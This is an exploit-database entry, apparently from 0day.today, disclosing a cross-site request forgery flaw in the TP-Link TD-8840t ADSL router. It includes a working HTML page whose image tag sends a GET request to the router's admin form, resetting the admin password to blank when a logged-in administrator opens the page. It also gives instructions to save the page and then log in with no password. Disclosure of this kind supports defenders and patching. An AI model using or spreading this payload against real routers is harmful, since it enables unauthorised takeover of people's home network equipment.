TP-Link TD-8840t - CSRF Vulnerability

2013-12-02T00:00:00
ID 1337DAY-ID-21601
Type zdt
Reporter Mohammed Al-Saggaf
Modified 2013-12-02T00:00:00

Description

TP-Link TD-8840t is a ADSL2+ Ethernet/USB Modem Router which works with a 24-Mbps downstream connection.#### Usage Info TP-Link TD-8840t is a ADSL2+ Ethernet/USB Modem Router which works with a 24-Mbps downstream connection. You can easily change the default user's (admin) password by the default router page listning on tcp/ip port 80. In here you the $_GET will change the password for you and the $_POST request method is not needed for changing the router pass.

                                        
                                            #Introduction
==============
TP-Link TD-8840t is a ADSL2+ Ethernet/USB Modem Router which works with a
24-Mbps  downstream connection.
 
#Description of Vulnerability
=============================
You can easily change the default user's (admin) password by the default
router page listning on tcp/ip port 80. In here you the $_GET will change
the password for you and the $_POST request method is not needed for
changing the router pass.
 
#Exploit
========
 
<html>
<!-- TP-Link TD-8840t CSRF Exploit -->
<body>
<img src="http://192.168.1.1/Forms/tools_admin_1"/>
</body>
</html>
 
==========
Save this as csrf.html and this will change the router password to blank if
the current user admin visits this page his password will be resetted to
blank. You can login with the username admin and password (blank).

#  0day.today [2018-03-13]  #